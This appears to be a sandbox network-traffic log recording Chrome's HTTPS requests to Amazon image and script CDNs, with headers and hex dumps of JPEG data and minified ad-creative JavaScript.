                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC4892INData Raw: 31 33 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 64 65 73 6b 74 6f 70 2d 61 64 2d 63 65 6e 74 65 72 2d 31 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61 67 65 54 79 70 65 25 32 32 25 33 41 25 32 32 47 61 74 65 77 61 79 25 32 32 25 32 43 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32
                                                                                                                                                                                                                                                                Data Ascii: 1314{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                63192.168.2.449908151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC683OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 1943
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: fdd8ed87-b2ae-4df0-97db-85eca2fa46e6
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 25 Aug 2043 06:55:09 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1814841
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:29 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000132-IAD, cache-ewr18127-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 7e 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 08 04 05 06 07 09 01 03 02 10 00 01 03 03 01 06 03 05 07 02 07 00 00 00 00 00 01 00 02 03 04 05 11 06 07 12 21 31 41 51 13 61 71 15 22 52 81 91 08 14 23 82 92 b1 c1 42 b3 32 33 44
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"~!1AQaq"R#B23D
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC565INData Raw: e6 f3 03 91 1d c0 e8 47 50 a4 1b f7 ec eb 7b 90 9b a5 a4 9c c7 b8 26 8f b3 78 86 3f f5 29 36 a2 6f d9 e2 22 db cd cc 81 ee 8a 2f a1 7c 8c 21 4b 24 d5 c1 11 14 51 11 10 11 11 01 11 10 6a 8d b8 6f 8d 2b 5e e6 72 6c b4 9b de 9e 33 14 0b 75 56 61 9a 03 dc e3 f7 0b a6 5a 92 c5 16 a1 b6 d7 db 26 e0 da a8 1e c0 e2 33 b8 e2 3d c7 e3 ae e3 b0 e5 cd 1b 85 b6 6a 09 e6 86 a9 85 92 40 f7 32 56 1e 6c 73 0e e9 f5 00 ab 89 aa 38 65 12 d3 c4 fe b1 92 d2 3d 78 85 4e e0 e3 8e e4 fe dc 57 a6 8d f4 ef df 67 16 bb fc 4d fe 47 a2 af 31 71 6f cd 54 56 db 62 f0 e3 2e ea e3 fb 2b 98 54 34 dc 1b bb d9 54 87 63 00 f5 41 52 d7 61 7e f7 f8 15 f1 05 66 ba 0b 46 4b ab ee 2c a5 19 10 47 87 54 ca 39 46 ce d9 f8 e4 e4 d1 ea 79 02 82 43 ec 17 4f ba 82 cf 35 c6 51 87 dc 1e 0b 47 68 a2 e0 cf
                                                                                                                                                                                                                                                                Data Ascii: GP{&x?)6o"/|!K$Qjo+^rl3uVaZ&3=j@2Vls8e=xNWgMG1qoTVb.+T4TcARa~fFK,GT9FyCO5QGh


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                64192.168.2.449909151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC365OUTGET /images/I/41Qtra7lf+L.js HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 24182
                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 074dc463-f5ac-4338-bff3-f99a3adccec4
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 25 May 2023 15:09:56 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Fri, 27 May 2044 23:45:51 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:29 GMT
                                                                                                                                                                                                                                                                Age: 891247
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000031-IAD, cache-ewr18147-EWR
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 76 61 72 20 43 72 65 61 74 69 76 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c
                                                                                                                                                                                                                                                                Data Ascii: var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurabl
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 6d 61 7a 6f 6e 5c 2e 2f 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 72 65 74 75 72 6e 20 72 2e 74 65 73 74 28 74 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 31 29 2c 6f 3d 2f 41 6e 64 72 6f 69 64 2f 2e 74 65 73 74 28 72 2e 61 29 3b 65 2e 61 3d 6f 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 7b 7d 3b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e
                                                                                                                                                                                                                                                                Data Ascii: mazon\./;function o(t){return r.test(t)}},function(t,e,n){"use strict";var r=n(1),o=/Android/.test(r.a);e.a=o},function(t,e,n){"use strict";n.d(e,"a",function(){return r});function r(t,e){var n=function(t){if("string"!=typeof t)return{};var e={};return t.
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 70 2d 63 74 78 74 22 29 29 3b 72 65 74 75 72 6e 20 65 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 65 7c 7c 22 2e 22 2c 74 2e 73 70 6c 69 74 28 65 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 74 2c 31 30 29 7c 7c 30 7d 29 7d 28 65 5b 31 5d 29 3a 5b 5d 7d 72 65 74 75 72 6e 5b 5d 7d 28 29 2c 76 3d 21 21 75 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 75 2e 67 65 74 53 44 4b 56 65 72 73 69 6f 6e 26 26 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 75 2e 67 65 74 53 44 4b 56 65 72 73 69 6f 6e 28 29 2e 6d 61 74 63 68 28 2f 28 5c 64 2b 29 5c 2e 28 5c 64 2b 29 2e 28 5c 64 2b 29 2f 29 3b 69 66 28 74 29 72 65 74 75 72 6e 5b 74 5b 31 5d 2c 74 5b 32 5d 2c 74 5b
                                                                                                                                                                                                                                                                Data Ascii: p-ctxt"));return e?function(t,e){return e=e||".",t.split(e).map(function(t){return parseInt(t,10)||0})}(e[1]):[]}return[]}(),v=!!u&&"function"==typeof u.getSDKVersion&&function(){var t=u.getSDKVersion().match(/(\d+)\.(\d+).(\d+)/);if(t)return[t[1],t[2],t[
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 6f 6e 4f 70 65 6e 49 6e 45 78 74 65 72 6e 61 6c 42 72 6f 77 73 65 72 22 2c 4d 52 41 49 44 5f 4f 50 45 4e 3a 22 6d 72 61 69 64 4f 70 65 6e 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 74 2c 65 29 7b 49 5b 74 5d 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 52 28 74 2c 65 29 7b 4d 28 50 2c 65 29 3b 74 72 79 7b 74 2e 63 61 6c 6c 28 74 68 69 73 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 4d 28 41 2c 74 2e 6d 65 73 73 61 67 65 29 2c 21 31 7d 72 65 74 75 72 6e 21 30 7d 76 61 72 20 6b 3d 78 2e 69 73 4d 73 68 6f 70 2c 4c 3d 78 2e 6d 61 73 68 49 73 41 55 49 41 76 61 69 6c 61 62 6c 65 2c 4e 3d 78 2e 6d 61 73 68 48 61 73 4c 61 75 6e 63 68 49 6e 74 65 6e 74 55 72 6c 2c 54 3d 78 2e 6d 61 73 68 48 61 73 4f 70 65 6e 49 6e 45 78 74 65 72 6e 61 6c 42 72 6f 77 73 65 72 3b 66
                                                                                                                                                                                                                                                                Data Ascii: onOpenInExternalBrowser",MRAID_OPEN:"mraidOpen"};function M(t,e){I[t]=e}function R(t,e){M(P,e);try{t.call(this)}catch(t){return M(A,t.message),!1}return!0}var k=x.isMshop,L=x.mashIsAUIAvailable,N=x.mashHasLaunchIntentUrl,T=x.mashHasOpenInExternalBrowser;f
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 22 29 2b 22 2f 61 70 70 2f 61 6d 61 7a 6f 6e 2d 70 72 69 6d 65 2d 6e 6f 77 2f 69 64 39 34 37 36 34 34 39 35 30 3f 6d 74 3d 38 22 7d 28 65 29 2c 75 72 6c 3a 74 7d 29 7d 2c 53 2e 4d 41 53 48 5f 4c 41 55 4e 43 48 5f 49 4e 54 45 4e 54 5f 55 52 4c 29 3a 21 21 54 26 26 52 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 64 65 66 61 75 6c 74 2e 6d 61 73 68 2e 6f 70 65 6e 49 6e 45 78 74 65 72 6e 61 6c 42 72 6f 77 73 65 72 2e 65 78 65 63 75 74 65 28 7b 75 72 6c 3a 74 7d 29 7d 2c 53 2e 4d 41 53 48 5f 4f 50 45 4e 5f 49 4e 5f 45 58 54 45 52 4e 41 4c 5f 42 52 4f 57 53 45 52 29 7d 28 65 2c 63 29 3a 21 6e 26 26 70 26 26 66 26 26 6c 26 26 4f 62 6a 65 63 74 28 42 2e 64 65 66 61 75 6c 74 29 28 65 2c 6e 29 3d 3d 3d 43 2e 61 3f 52 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                Data Ascii: ")+"/app/amazon-prime-now/id947644950?mt=8"}(e),url:t})},S.MASH_LAUNCH_INTENT_URL):!!T&&R(function(){return o.default.mash.openInExternalBrowser.execute({url:t})},S.MASH_OPEN_IN_EXTERNAL_BROWSER)}(e,c):!n&&p&&f&&l&&Object(B.default)(e,n)===C.a?R(function(
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 34 37 34 30 39 39 31 2c 72 3d 2f 5e 28 3f 3a 30 7c 5b 31 2d 39 5d 5c 64 2a 29 24 2f 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6f 3d 74 79 70 65 6f 66 20 74 3b 72 65 74 75 72 6e 21 21 28 65 3d 6e 75 6c 6c 3d 3d 65 3f 6e 3a 65 29 26 26 28 22 6e 75 6d 62 65 72 22 3d 3d 6f 7c 7c 22 73 79 6d 62 6f 6c 22 21 3d 6f 26 26 72 2e 74 65 73 74 28 74 29 29 26 26 74 3e 2d 31 26 26 74 25 31 3d 3d 30 26 26 74 3c 65 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 31 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 3e 2d 31 26 26 74 25 31 3d 3d 30 26 26 74 3c 3d 6e
                                                                                                                                                                                                                                                                Data Ascii: 4740991,r=/^(?:0|[1-9]\d*)$/;t.exports=function(t,e){var o=typeof t;return!!(e=null==e?n:e)&&("number"==o||"symbol"!=o&&r.test(t))&&t>-1&&t%1==0&&t<e}},function(t,e){var n=9007199254740991;t.exports=function(t){return"number"==typeof t&&t>-1&&t%1==0&&t<=n
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 6e 20 6e 29 69 66 28 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 69 29 29 7b 76 61 72 20 75 3d 6e 5b 69 5d 3b 69 66 28 75 29 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75 29 72 28 75 29 3b 65 6c 73 65 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 75 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 43 6f 75 6c 64 20 6e 6f 74 20 66 69 72 65 20 70 69 78 65 6c 3a 20 22 27 2b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 75 29 2b 27 22 20 69 73 20 6e 6f 74 20 61 20 73 74 72 69 6e 67 21 27 29 3b 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 75 29 7d 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 3b 76 61 72 20 72 3d 6e 28 31 29 2c 6f 3d 6e 28 32 29 2c 69 3d
                                                                                                                                                                                                                                                                Data Ascii: n n)if(n.hasOwnProperty(i)){var u=n[i];if(u)if("string"==typeof u)r(u);else{if(!Array.isArray(u))throw new Error('Could not fire pixel: "'+JSON.stringify(u)+'" is not a string!');t.apply(this,u)}}}},function(t,e,n){"use strict";n.r(e);var r=n(1),o=n(2),i=
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 65 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 31 35 30 30 3d 3d 3d 74 2e 77 69 64 74 68 26 26 36 30 30 3d 3d 3d 74 2e 68 65 69 67 68 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 39 37 30 3d 3d 3d 74 2e 77 69 64 74 68 26 26 32 35 30 3d 3d 3d 74 2e 68 65 69 67 68 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 74 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 2e 77 69 64 74 68 3e 3d 39 30 30 7c 7c 36 33 30 3d 3d 3d 74 2e 77 69 64 74 68 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31
                                                                                                                                                                                                                                                                Data Ascii: n(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.default=function(t){if(1500===t.width&&600===t.height)return!1;if(970===t.width&&250===t.height)return!1;if((0,r.default)(t))return!1;if(t.width>=900||630===t.width)return!0;return!1
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 66 61 75 6c 74 3b 69 66 28 21 69 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 4e 6f 20 53 61 66 65 46 72 61 6d 65 20 63 6c 69 65 6e 74 20 66 6f 75 6e 64 22 29 3b 69 2e 63 68 61 6e 67 65 53 69 7a 65 28 61 28 65 29 2c 61 28 6e 29 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 65 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 70 6f 73 69 74 69 6f 6e 2c 6e 3d 74 2e 6d 65 64 69 61 43 65 6e 74 72 61 6c 50 61 74 68 2c 72 3d 74 2e 69 73 52 65 74 69 6e 61 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 26 26 72 3f
                                                                                                                                                                                                                                                                Data Ascii: fault;if(!i)throw new Error("No SafeFrame client found");i.changeSize(a(e),a(n))}},function(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.default=function(t){var e=t.position,n=t.mediaCentralPath,r=t.isRetina;return void 0!==r&&r?
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 61 74 63 68 4d 65 64 69 61 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 39 32 64 70 69 29 22 29 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 28 65 2e 6d 61 74 63 68 65 73 29 7d 3b 65 26 26 6e 28 65 29 2c 65 2e 61 64 64 4c 69 73 74 65 6e 65 72 26 26 65 2e 61 64 64 4c 69 73 74 65 6e 65 72 28 6e 29 7d 65 6c 73 65 20 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 3e 31 3f 74 28 21 30 29 3a 74 28 21 31 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65
                                                                                                                                                                                                                                                                Data Ascii: atchMedia){var e=window.matchMedia("(-webkit-min-device-pixel-ratio: 2),(min-resolution: 192dpi)"),n=function(e){return t(e.matches)};e&&n(e),e.addListener&&e.addListener(n)}else window.devicePixelRatio>1?t(!0):t(!1)}},function(t,e){t.exports=function(t,e


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                65192.168.2.449911151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC411OUTGET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC525INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 94765
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: b8ceec20-3245-42b8-8c0c-47bf23ccb7c5
                                                                                                                                                                                                                                                                Last-Modified: Tue, 11 Jan 2022 14:51:27 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:29 GMT
                                                                                                                                                                                                                                                                Age: 82946
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200053-IAD, cache-ewr18132-EWR
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 4a 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 01 00 69 87 04 00 01 00 00 00 1a 00 00 00 00 00 00 00 01 00 86 92 07 00 15 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 65 72 73 69 6f 6e 20 31 2e 30 2e 30 00 ff db 00 43 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0e 0f 10 0f 0e 0c 13 13 14 14 13 13 1c 1b 1b 1b 1c 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff db 00 43 01 07 07 07 0d 0c 0d 18 10 10 18 1a 15 11 15 1a 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff c0 00 11 08 01 f4 07 94 03 00 11 00 01 11 01 02 11 01 ff c4
                                                                                                                                                                                                                                                                Data Ascii: JFIFJExifII*i,Version 1.0.0CC
